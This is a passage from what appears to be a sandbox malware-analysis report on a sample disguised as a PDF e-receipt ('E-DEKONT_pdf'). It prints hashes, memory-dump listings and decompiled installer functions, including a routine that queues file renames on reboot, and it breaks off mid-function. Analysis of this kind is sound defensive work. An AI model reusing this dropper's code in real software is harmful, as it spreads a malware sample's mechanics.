Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 879dab8adba2f9aa78ce493a825e568d84b0fc3c6a624ff37d4c52904f736a2e
Instruction ID: 7e251da369cce2a0c70c0416880034a7dcf795692c70faff6064ed152339fd79
Opcode Fuzzy Hash: 879dab8adba2f9aa78ce493a825e568d84b0fc3c6a624ff37d4c52904f736a2e
Instruction Fuzzy Hash: ABB09235184A04ABDA114B10DE09F457AA2A764701F00802CB240240F0CAB200A0EB08

Uniqueness

Uniqueness Score: -1.00%

Function 004042D3 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042D3(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x7b0d64, _a4); // executed
				return _t2;
			}

0x004042dd
0x004042e3

APIs

KiUserCallbackDispatcher.NTDLL(?,004040AF), ref: 004042DD

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 4c8031cc7c32e63a26b9072e6b21cab50e0cc99040d0d4d2a2a1aa64b3ab23f1
Instruction ID: a0e4dc20e7d708fddb33ac6da319dcbfa590644fed3cd152995165668b477e78
Opcode Fuzzy Hash: 4c8031cc7c32e63a26b9072e6b21cab50e0cc99040d0d4d2a2a1aa64b3ab23f1
Instruction Fuzzy Hash: CDA002755445409BCA115F50DF05D077B61A7947017018579A1459007487755460EB59

Uniqueness

Uniqueness Score: -1.00%

Function 6EC912C6 Relevance: 1.3, APIs: 1, Instructions: 4
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EC912C6() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x6ec95040); // executed
				return _t1;
			}

0x6ec912ce
0x6ec912d4

APIs

GlobalAlloc.KERNELBASE(00000040,6EC911C4,-000000A0), ref: 6EC912CE

Memory Dump Source

Source File: 00000000.00000002.3357909179.000000006EC91000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EC90000, based on PE: true

Associated: 00000000.00000002.3357866144.000000006EC90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3357973966.000000006EC94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3358014204.000000006EC96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec90000_E-DEKONT_pdf.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: b850d5e9d456af48e02c54263fa365cecb1a15483b4218bbbd6bdc126b2c3fa9
Instruction ID: b2b91101ef370f1ae8dd32b43cb228cdd315f5fba4b6885f45b295a1dcb1abff
Opcode Fuzzy Hash: b850d5e9d456af48e02c54263fa365cecb1a15483b4218bbbd6bdc126b2c3fa9
Instruction Fuzzy Hash: DEA00271540900DBDF415F90AB5EF283B31B746707F542044E3356909096790431DB65

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405E9D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E9D(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7bd2f8 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x7bd6f8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7bcef8, "%s=%s\r\n", 0x7bd2f8, 0x7bd6f8);
						_t53 = _t52 + 0x10;
						E004062C7(_t37, 0x400, 0x7bd6f8, 0x7bd6f8,  *((intOrPtr*)( *0x7c5f70 + 0x128)));
						_t12 = E00405DC7(0x7bd6f8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E3F(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D2C(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D2C(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D82(_t24 + _t46, 0x7bcef8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E6E(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DC7(_t44, 0, "true"));
					_t12 = GetShortPathNameA(_t44, 0x7bd2f8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405e9d
0x00405ea6
0x00405ead
0x00405ec1
0x00405ee9
0x00405ef4
0x00405ef8
0x00405f18
0x00405f1f
0x00405f29
0x00405f36
0x00405f3b
0x00405f40
0x00405f44
0x00405f53
0x00405f55
0x00405f62
0x00405f66
0x00406001
0x00000000
0x00405f7c
0x00405f89
0x00405fad
0x00405fb1
0x00405fd0
0x00405fd4
0x00405fd4
0x00405fd6
0x00405fdf
0x00405fea
0x00405ff5
0x00405ffb
0x00000000
0x00405ffb
0x00405fb3
0x00405fb6
0x00405fc1
0x00405fbd
0x00405fbf
0x00405fc0
0x00405fc0
0x00405fc8
0x00405fca
0x00000000
0x00405fca
0x00405f94
0x00405f9a
0x00000000
0x00405f9a
0x00405f66
0x00405f44
0x00405ec3
0x00405ece
0x00405ed7
0x00405edb
0x00000000
0x00000000
0x00405edb
0x0040600c

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,0040602E,?,?), ref: 00405ECE
GetShortPathNameA.KERNEL32(?,007BD2F8,00000400), ref: 00405ED7

Part of subcall function 00405D2C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F87,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D3C
Part of subcall function 00405D2C: lstrlenA.KERNEL32(00000000,?,00000000,00405F87,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D6E

GetShortPathNameA.KERNEL32(?,007BD6F8,00000400), ref: 00405EF4
wsprintfA.USER32 ref: 00405F12
GetFileSize.KERNEL32(00000000,00000000,007BD6F8,C0000000,00000004,007BD6F8,?,?,?,?,?), ref: 00405F4D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F5C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F94
SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,007BCEF8,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEA
GlobalFree.KERNEL32(00000000), ref: 00405FFB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406002

Part of subcall function 00405DC7: GetFileAttributesA.KERNELBASE(00000003,00402F4C,007FD000,80000000,00000003,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DCB
Part of subcall function 00405DC7: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DED

Strings

[Rename], xrefs: 00405F7C, 00405F8E
%s=%s, xrefs: 00405F08

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 407d3f39375f04666bf0075d05f05ff1aab4f6bcb9be43fe1d438fc296dc3887
Instruction ID: 3c3f16b6a95818e59085580230d08641eb27af804ba5071be98a2a90f5394367
Opcode Fuzzy Hash: 407d3f39375f04666bf0075d05f05ff1aab4f6bcb9be43fe1d438fc296dc3887
Instruction Fuzzy Hash: 0C314671240B06BBD2206B659D48F6B3A5CEF45758F14003EF942F62D2EA7CE8118ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00404318 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404318(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040432a
0x004043e0
0x00000000
0x004043e0
0x0040433b
0x0040433f
0x00000000
0x00404359
0x00404359
0x00404362
0x00000000
0x00000000
0x00404364
0x00404370
0x00404373
0x00404373
0x00404379
0x0040437f
0x0040437f
0x0040438b
0x00404391
0x00404398
0x0040439b
0x0040439e
0x004043a0
0x004043a0
0x004043a8
0x004043ae
0x004043ae
0x004043b8
0x004043bd
0x004043c0
0x004043c5
0x004043c8
0x004043c8
0x004043d8
0x004043d8
0x00000000
0x004043db

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404335
GetSysColor.USER32(00000000), ref: 00404373
SetTextColor.GDI32(?,00000000), ref: 0040437F
SetBkMode.GDI32(?,?), ref: 0040438B
GetSysColor.USER32(?), ref: 0040439E
SetBkColor.GDI32(?,?), ref: 004043AE
DeleteObject.GDI32(?), ref: 004043C8
CreateBrushIndirect.GDI32(?), ref: 004043D2

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
Instruction ID: c1cf03454db873b669fe455fbfc5093d6825193a47bfd1230063ce26bbb8ff3d
Opcode Fuzzy Hash: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
Instruction Fuzzy Hash: 0F217771601704AFC734DF39D948B5BBBF8AF41714B04892EED92A22E0D774E904CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6EC92128 Relevance: 10.6, APIs: 7, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6EC92128(intOrPtr* _a4) {
				short _v84;
				intOrPtr* _t24;
				signed int _t25;
				intOrPtr _t26;
				intOrPtr _t33;
				void* _t39;
				void* _t42;

				_t39 = E6EC912C6();
				_t24 = _a4;
				_t33 =  *((intOrPtr*)(_t24 + 0x814));
				_t42 = (_t33 + 0x41 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
					}
					_t25 =  *(_t42 - 8) & 0x000000ff;
					if(_t25 <= 7) {
						switch( *((intOrPtr*)(_t25 * 4 +  &M6EC92268))) {
							case 0:
								 *_t39 = 0;
								goto L17;
							case 1:
								__edx =  *__edx;
								if(__ecx > 0) {
									__ecx = __ecx - 1;
									__ecx = __ecx *  *(0x6ec94060 + __eax * 4);
									asm("sbb eax, eax");
									__edx = __edx &  *(0x6ec94080 + __eax * 4);
								}
								_push(__edx);
								goto L15;
							case 2:
								_push(__edi);
								_push(__edx[1]);
								_push( *__edx);
								__eax = E6EC9144D(__ecx);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__edx,  *0x6ec95040);
								goto L17;
							case 4:
								__ecx =  *0x6ec95040;
								__ecx - 1 = WideCharToMultiByte(0, 0,  *__edx, __ecx, __edi, __ecx - 1, 0, 0);
								__eax =  *0x6ec95040;
								 *((char*)(__eax + __edi - 1)) = 0;
								goto L17;
							case 5:
								_push(0x27);
								__eax =  &_v84;
								_push( &_v84);
								_push( *__edx);
								__imp__StringFromGUID2();
								__ecx = 0;
								__eax =  &_v84;
								__eax = WideCharToMultiByte(0, 0,  &_v84,  &_v84, __edi,  *0x6ec95040, 0, 0);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x6ec94058);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
						GlobalFree( *(_t42 + 0x14));
					}
					_t26 =  *((intOrPtr*)(_t42 + 0xc));
					if(_t26 != 0) {
						if(_t26 != 0xffffffff) {
							if(_t26 > 0) {
								E6EC915C7(_t26 - 1, _t39);
								goto L26;
							}
						} else {
							E6EC9157E(_t39);
							L26:
						}
					}
					_t42 = _t42 - 0x20;
					_t33 = _t33 - 1;
				} while (_t33 >= 0);
				return GlobalFree(_t39);
			}

0x6ec92136
0x6ec92138
0x6ec9213b
0x6ec92147
0x6ec92149
0x6ec9214e
0x6ec9214e
0x6ec92156
0x6ec9215d
0x6ec92163
0x00000000
0x6ec9216a
0x00000000
0x00000000
0x6ec92172
0x6ec92176
0x6ec92178
0x6ec92179
0x6ec92184
0x6ec92188
0x6ec92188
0x6ec9218f
0x00000000
0x00000000
0x6ec92192
0x6ec92193
0x6ec92196
0x6ec92198
0x00000000
0x00000000
0x6ec921a8
0x00000000
0x00000000
0x6ec921d8
0x6ec921ee
0x6ec921f4
0x6ec921f9
0x00000000
0x00000000
0x6ec921b0
0x6ec921b2
0x6ec921b5
0x6ec921b6
0x6ec921b8
0x6ec921be
0x6ec921ca
0x6ec921d0
0x00000000
0x00000000
0x6ec92200
0x6ec92202
0x6ec92208
0x6ec9220e
0x6ec9220e
0x00000000
0x00000000
0x6ec92163
0x6ec92211
0x6ec92215
0x6ec92228
0x6ec92228
0x6ec9222e
0x6ec92233
0x6ec92238
0x6ec92244
0x6ec92249
0x00000000
0x6ec9224e
0x6ec9223a
0x6ec9223b
0x6ec9224f
0x6ec9224f
0x6ec92238
0x6ec92250
0x6ec92253
0x6ec92253
0x6ec92267

APIs

Part of subcall function 6EC912C6: GlobalAlloc.KERNELBASE(00000040,6EC911C4,-000000A0), ref: 6EC912CE

GlobalFree.KERNEL32(00000000), ref: 6EC92228
GlobalFree.KERNEL32(00000000), ref: 6EC9225D

Memory Dump Source

Source File: 00000000.00000002.3357909179.000000006EC91000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EC90000, based on PE: true

Associated: 00000000.00000002.3357866144.000000006EC90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3357973966.000000006EC94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3358014204.000000006EC96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec90000_E-DEKONT_pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a9eb216fa2529e54b991890c8fcbb8d296b157dc28661f4f74d393e86ecd6d76
Instruction ID: 9a09cecb9ebd45c7b1c87021755e55faaf7408291603c1fcb5ec08d2df63596f
Opcode Fuzzy Hash: a9eb216fa2529e54b991890c8fcbb8d296b157dc28661f4f74d393e86ecd6d76
Instruction Fuzzy Hash: 7E41FF31104900EFEB198FD9EEA5F6A7BB8FB46311F000119F9A09B180F731A855EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00402E25 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E25(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, "true", 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x79ad18; // 0x560f8
					_t11 =  *0x7a6d24; // 0x560fc
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402e32
0x00402e40
0x00402e46
0x00402e46
0x00402e54
0x00402e56
0x00402e5c
0x00402e63
0x00402e65
0x00402e65
0x00402e7b
0x00402e8b
0x00402e9d
0x00402e9d
0x00402ea5

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E40
MulDiv.KERNEL32(000560F8,00000064,000560FC), ref: 00402E6B
wsprintfA.USER32 ref: 00402E7B
SetWindowTextA.USER32(?,?), ref: 00402E8B
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E9D

Strings

verifying installer: %d%%, xrefs: 00402E75

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 4f4a4cd6def6ecdee58c4d477b8e0a51eb3349eb3cf07d6a946c4631745aadd2
Instruction ID: 50d4b92baf77fe00a7f3d2a7bcb5f53935e896cd5d52c500868d99ad50879bb8
Opcode Fuzzy Hash: 4f4a4cd6def6ecdee58c4d477b8e0a51eb3349eb3cf07d6a946c4631745aadd2
Instruction Fuzzy Hash: 5201627164020DFBEF109F60DE09EAE3BA9EB44344F008039FA06B51D0DBB89A51CF99

Uniqueness

Uniqueness Score: -1.00%

Function 6EC910C6 Relevance: 8.9, APIs: 7, Instructions: 155
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EC910C6(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				signed int _v0;
				void _t29;
				void* _t30;
				void* _t36;
				void* _t43;
				intOrPtr _t52;
				void* _t56;
				void* _t62;
				void* _t63;
				void _t66;
				void* _t67;
				void* _t74;
				signed int _t75;
				void* _t79;
				void* _t80;
				void* _t82;
				signed int _t83;
				void* _t85;
				void _t88;
				void _t89;
				void* _t90;
				void* _t92;
				void* _t94;

				 *0x6ec95040 = _a8;
				 *0x6ec9503c = _a16;
				 *0x6ec95038 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6ec95014, E6EC912F7, _t79, _t82);
				_t83 =  *0x6ec95040 * 0x14;
				_v0 = _t83;
				_t90 = E6EC9152B();
				_a8 = _t90;
				_t80 = _t90;
				_t66 = _v0;
				if(_t66 == 0) {
					L28:
					return GlobalFree(_t90);
				}
				do {
					_t29 = _t66;
					_t80 = _t80 + 1;
					_t94 = _t29 - 0x66;
					if(_t94 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L24:
							_t31 =  *0x6ec95010;
							if( *0x6ec95010 != 0) {
								E6EC912FA( *0x6ec95038, _t31 + 4, _t83);
								_t67 =  *0x6ec95010;
								_t92 = _t92 + 0xc;
								 *0x6ec95010 =  *_t67;
								GlobalFree(_t67);
							}
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L15:
							GlobalFree(E6EC9157E(E6EC914E2( *_t80 - 0x30)));
							_t80 = _t80 + 1;
							goto L26;
						}
						_t43 = _t36;
						if(_t43 == 0) {
							L13:
							GlobalFree(E6EC915C7( *_t80 - 0x30, E6EC9152B()));
							_t80 = _t80 + 1;
							L11:
							_t83 = _v0;
							goto L26;
						}
						L8:
						if(_t43 != 1) {
							goto L26;
						}
						_t88 = GlobalAlloc(0x40, _t83 + 4);
						_t11 = _t88 + 4; // 0x4
						E6EC912FA(_t11,  *0x6ec95038, _v0);
						 *_t88 =  *0x6ec95010;
						 *0x6ec95010 = _t88;
						L10:
						_t92 = _t92 + 0xc;
						goto L11;
					}
					if(_t94 == 0) {
						_t74 =  *0x6ec9503c;
						_t85 =  *_t74;
						 *_t74 =  *_t85;
						_t75 = _v0;
						_t52 =  *((intOrPtr*)(_t75 + 0xc));
						_a12 = _t52;
						if( *((char*)(_t85 + 4)) == 0x1e) {
							E6EC912FA(_t75, _t85 + 6, 0x38);
							_t75 = _v0;
							_t92 = _t92 + 0xc;
							_t52 = _a12;
						}
						 *((intOrPtr*)(_t75 + 0xc)) = _t52;
						GlobalFree(_t85);
						goto L11;
					}
					_t56 = _t29 - 0x46;
					if(_t56 == 0) {
